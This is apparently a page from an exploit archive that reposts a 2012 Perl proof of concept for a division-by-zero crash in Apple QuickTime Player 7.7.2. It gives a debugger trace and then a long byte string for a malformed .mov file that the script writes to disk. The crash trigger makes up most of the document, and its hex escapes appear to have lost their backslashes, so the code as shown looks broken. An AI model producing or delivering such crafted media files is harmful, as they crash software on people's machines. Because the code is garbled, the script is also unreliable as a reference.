Home / exploits Apple QuickTime Player 7.7.2 Crash
Posted on 25 October 2012
#!/usr/bin/perl #Title : Apple QuickTime Player 7.7.2 Division By Zero #Version : 7.7.2(1680.56) #Date : 2012-10-23 #Vendor : http://www.apple.com #Impact : Med/High #Contact : coolkaveh [at] rocketmail.com #Twitter : @coolkaveh #tested : XP SP3 ENG ############################################################################### #Bug : #---- #Don't forget that exploitable bugs will be published after being patched #---- #Division by zero vulnerability during the handling of the (.mov) files. #That will trigger a denial of service condition #---- ################################################################################ #(9fc.dc4): C++ EH exception - code e06d7363 (first chance) #(9fc.dc4): C++ EH exception - code e06d7363 (first chance) #(9fc.dc4): Integer divide-by-zero - code c0000094 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00000800 #ebx=06b11490 #ecx=00000000 #edx=00000000 #esi=00000800 #edi=01069f80 #eip=0534499f #esp=0013ba24 #ebp=00000000 iopl=0 nv up ei ng nz na pe cy #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010287 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for #C:Program FilesCommon FilesAppleApple Application SupportCoreAudioToolbox.dll - #CoreAudioToolbox!ACQDesignDecoderEntry+0x2114f: #0534499f f7f9 idiv eax,ecx ######################################################################################################## my $poc = "x00x00x07xB5x6Dx6Fx6Fx76x00x00x00x6Cx6Dx76x68x64x00x00x00x00xB6xB6xFEx42xB6". "xB6xFEx43x00x00x02x58x00x00x0BxB8x00x01x00x00x00xFFx00x00x00x00x00x00x00x00". "x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00x00x00x00x00x08x34". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x03x00x00x03xD9x74x72x61x6Bx00". "x00x00x5Cx74x6Bx68x64x00x00x00x0FxB6xA9x7Ax1BxB6xB6xFEx43x00x00x00x01x00x00". "x00x00x00x00x0BxB8x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x40x00x00x00x00xBEx00x00x00xF0x00x00x00x00x00x18x6Cx6Fx61x64x00". "x00x00x00x00x00x00x00x00x00x00x01x00x00x01x00x00x00x00x24x65x64x74x73x00x00". "x00x1Cx65x6Cx73x74x00x00x00x00x00x00x00x01x00x00x0BxB8x00x00x00x00x00x01x00". "x00x00x00x03x2Dx6Dx64x69x61x00x00x00x20x6Dx64x68x64x00x00x00x00xB6xB6xFEx42". "xB6xB6xFEx43x00x00x02x58x00x00x0BxB8x00x00x00x00x00x00x00x3Ax68x64x6Cx72x00". "x00x00x00x6Dx68x6Cx72x76x69x64x65x61x70x70x6Cx00x00x00x00x00x01x01x91x19x41". "x70x70x6Cx65x20x56x69x64x65x6Fx20x4Dx65x64x69x61x20x48x61x6Ex64x6Cx65x72x00". "x00x02xCBx6Dx69x6Ex66x00x00x00x14x76x6Dx68x64x00x00x00x01x00x40x80x00x80x00". "x80x00x00x00x00x39x68x64x6Cx72x00x00x00x00x64x68x6Cx72x61x6Cx69x73x61x70x70". "x6Cx40x00x00x01x00x01x00x49x18x41x70x70x6Cx65x20x41x6Cx69x61x73x20x44x61x74". "x61x20x48x61x6Ex64x6Cx65x72x00x00x00x24x64x69x6Ex66x00x00x00x1Cx64x72x65x66". "x00x00x00x00x00x00x00x01x00x00x00x0Cx61x6Cx69x73x00x00x00x01x00x00x02x52x73". "x74x62x6Cx00x00x00x66x73x74x73x64x00x00x00x00x00x00x00x01x00x00x00x56x53x56". "x51x31x00x00x00x00x00x00x00x01x00x02x00x18x53x56x69x73x00x00x03xFFx00x00x02". "x00x00xBEx00xF0x00x48x00x00x00x48x00x00x00x00x00x00x00x01x0Ex53x6Fx72x65x6E". "x73x6Fx6Ex20x56x69x64x65x6Fx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x18xFFxFFx00x00x00x18x73x74x74x73x00x00x00x00x00x00x00x01x00x00x00x3C". "x00x00x00x32x00x00x00x18x73x74x73x73x00x00x00x00x00x00x00x02x00x00x00x01x00". "x00x00x02x00x00x00x4Cx73x74x73x63x00x00x00x00x00x00x00x05x00x00x00x01x00x00". "x00x03x00x00x00x01x00x00x00x11x00x00x00x02x00x00x00x01x00x00x00x12x00x00x00". "x03x00x00x00x01x00x00x00x13x00x00x00x01x00x00x00x01x00x00x00x14x00x00x00x03". "x00x00x00x01x00x00x01x04x73x74x73x7Ax00x00x00x00x00x00x00x00x00x00x00x3Cx00". "x00x01x94x00x00x01xE4x00x00x00x7Cx00x00x00x44x00x00x00x44x00x00x00x60x00x00". "x00x60x00x00x00x64x00x00x00x6Cx00x00x00x70x00x00x00x88x00x00x00x44x00x00x00". "x88x00x00x00x58x00x00x00xD0x00x00x01x2Cx00x00x02x10x00x00x02xD0x00x00x03xE4". "x00x00x04x00x00x00x05xC8x00x00x06xE8x00x00x08x78x00x00x06x40x00x00x0Ax14x00". "x00x09x68x00x00x0Bx88x00x00x0Ax1Cx00x00x0Cx10x00x00x0Ax20x00x00x10x4Cx00x00". "x0Ex90x00x00x13x5Cx00x00x0Ex80x00x00x0Fx78x00x00x0Ax54x00x00x0Cx3Cx00x00x02". "x84x00x00x06x74x00x00x01xF0x00x00x03x28x00x00x00xB4x00x00x00xA4x00x00x00x9C". "x00x00x00x88x00x00x00x3Cx00x00x00x60x00x00x00x34x00x00x00x6Cx00x00x00x60x00". "x00x00x40x00x00x00x40x00x00x00x68x00x00x00x54x00x00x00x38x00x00x00x44x00x00". "x00x60x00x00x00x40x00x00x00x3Cx00x00x00x40x00x00x00x64x73x74x63x6Fx00x00x00". "x00x00x00x00x15x00x00x17xCBx00x00x1BxBFx00x00x25x53x00x00x26x83x00x00x2ExF9". "x00x00x30xA9x00x00x3DxEFx00x00x4Bx9Bx00x00x69xE7x00x00x88xEBx00x00xB0x71x00". "x00xE2xA9x00x01x13xA1x00x01x28xD5x00x01x35xDBx00x01x37xA3x00x01x3Ex3Bx00x01". "x3Fx07x00x01x3FxEFx00x01x40x43x00x01x41x1Fx00x00x00x0Cx75x64x74x61x00x00x00". "x00x00x00x02xD7x74x72x61x6Bx00x00x00x5Cx74x6Bx68x64x00x00x00x0FxB6xA9x7Ax1B". "xB6xB6xFEx43x00x00x00x02x00x00x00x00x00x00x0Bx89x00x00x00x00x00x00x00x00x00". "x00x00x00x01x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x24x65x64x74x73x00x00x00x1Cx65x6Cx73x74x00x00x00x00x00x00x00x01". "x00x00x0Bx89x00x00x00x00x00x01x00x00x00x00x02x43x6Dx64x69x61x00x00x00x20x6D". "x64x68x64x00x00x00x00xB6xB6xFEx42xB6xB6xFEx42x00x00x56x22x00x01xA8x00x00x00". "x00x00x00x00x00x3Ax68x64x6Cx72x00x00x00x00x6Dx68x6Cx72x73x6Fx75x6Ex61x70x70". "x6Cx00x00x00x00x00x01x01x92x19x41x70x70x6Cx65x20x53x6Fx75x6Ex64x20x4Dx65x64". "x69x61x20x48x61x6Ex64x6Cx65x72x00x00x01xE1x6Dx69x6Ex66x00x00x00x10x73x6Dx68". "x64x00x00x00x00x00x00x00x00x00x00x00x39x68x64x6Cx72x00x00x00x00x64x68x6Cx72". "x61x6Cx69x73x61x70x70x6Cx40x00x00x01x00x01x00x49x18x41x70x70x6Cx65x20x41x6C". "x69x61x73x20x44x61x74x61x20x48x61x6Ex64x6Cx65x72x00x00x00x24x64x69x6Ex66x00". "x00x00x1Cx64x72x65x66x00x00x00x00x00x00x00x01x00x00x00x0Cx61x6Cx69x73x00x00". "x00x01x00x00x01x6Cx73x74x62x6Cx00x00x00x84x73x74x73x64x00x00x00x00x00x00x00". "x01x00x00x00x74x51x44x4Dx32x00x00x00x00x00x00x00x01x00x01x00x00x00x00x00x00". "x00x02x00x10x00x00x00x00x56x22x00x00x00x00x08x00x00x00x00xB9x00x00x01x72x00". "x00x00x02x00x00x00x40x77x61x76x65x00x00x00x0Cx66x72x6Dx61x51x44x4Dx32x00x00". "x00x24x51x44x43x41x00x00x00x01x00x00x00x02x00x00x56x22x00x00x7Dx00x00x00x08". "x00x00x00x00x00x00x00x01x72x00x00x00x08x00x00x00x00x00x00x00x18x73x74x74x73". "x00x00x00x00x00x00x00x01x00x01xA8x00x00x00x00x01x00x00x00x7Cx73x74x73x63x00". "x00x00x00x00x00x00x09x00x00x00x01x00x00x30x00x00x00x00x01x00x00x00x02x00x00". "x28x00x00x00x00x01x00x00x00x03x00x00x30x00x00x00x00x01x00x00x00x04x00x00x28". "x00x00x00x00x01x00x00x00x06x00x00x30x00x00x00x00x01x00x00x00x07x00x00x28x00". "x00x00x00x01x00x00x00x08x00x00x30x00x00x00x00x01x00x00x00x09x00x00x28x00x00". "x00x00x01x00x00x00x0Ax00x00x20x00x00x00x00x01x00x00x00x14x73x74x73x7Ax00x00". "x00x00x00x00x00x01x00x01xA8x00x00x00x00x38x73x74x63x6Fx00x00x00x00x00x00x00". "x0Ax00x00x07xE5x00x00x10x91x00x00x1CxA7x00x00x27xBFx00x00x36xB5x00x00x61x3B". "x00x00xA9x37x00x01x0AxF5x00x01x2ExA1x00x01x38x73x00x00x00x0Cx75x64x74x61x00". "x00x00x00x00x00x00x91x75x64x74x61x00x00x00x20x4Dx43x50x53x4Dx43x50x52x2Dx66". "x6Fx72x20x4Dx61x63x69x6Ex74x6Fx73x68x2Dx35x2Ex30x2Ex30x00x00x00x10x70x6Cx61". "x79x01x00x00x00x0Cx57x4Cx4Fx00x00x00x22xA9x6Ex61x6Dx00x16x00x00x51x75x69x63". "x6Bx54x69x6Dx65x20x53x61x6Dx70x6Cx65x20x4Dx6Fx76x69x65x00x00x00x27xA9x63x70". "x79x00x1Bx00x00xA9x20x41x70x70x6Cx65x20x43x6Fx6Dx70x75x74x65x72x2Cx20x49x6E". "x63x2Ex20x32x30x30x31x00x00x00x0Cx57x4Cx4Fx43x00x32x00x17x00x00x00x00x00x00". "x00x10x66x72x65x65x00x00x00x00x00x00x00x00x00x00x00x08x77x69x64x65x00x01x3A". "x0Ex6Dx64x61x74x00x00x00x08x77x69x64x65x00x00x00x00x6Dx64x61x74x82x01x6Fx17". "x18x09x25xCCx2Fx93xF9x65x32xBFx4CxE6x97xC9xFCx32x99x5Fx26xF3xCBx64x7Ex99xCC". "x2Fx93xF9x65x32xBFx4CxE6x97xC9xFCx32x99x5Fx26x16x01x16x15x01x55x14x01x55x13". "x01x20x12x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x82x01x6Fx17x18x09x25xCCx2F". "x93xF9x65x32xBFx4CxE6x97xC9xFCx32x99x5Fx26xF3xCBx64x7Ex99xCCx2Fx93xF9x65x32". "xBFx4CxE6x97xC9xFCx32x99x5Fx26x16x01x16x15x01x55x14x01x55x13x01x20x12x01x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x82x01x6Fx26xA8x09x25xCCx2Fx93xF9x65x32xBF". "x4CxE6x97xC9xFCx32x99x5Fx26xF3xCBx64x7Ex99xCCx2Fx93xF9x65x32xBFx4CxE6x97xC9". "xFCx32x99x5Fx26x16x01x16x15x01x55x14x01x55x13x01x20x12x24xFCx45xCCxEAx46xA1". "x36x36x3AxB7x2Ex1Ax54x45x5BxD5x48x5Dx35xF2x4Ax45xB4x8AxA8x14xD1x28x46x58x50". "x23x02xAAx31xE5x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x82x01x6Fx97xF2x09x3Bx31x53x5FxE1xB8xC3x13xF5xE8xD1x41x62". "xDDxDDxD6xA4xF5xE0x0D". open(C, ">:raw", "poc.mov"); print C $poc; close(C);
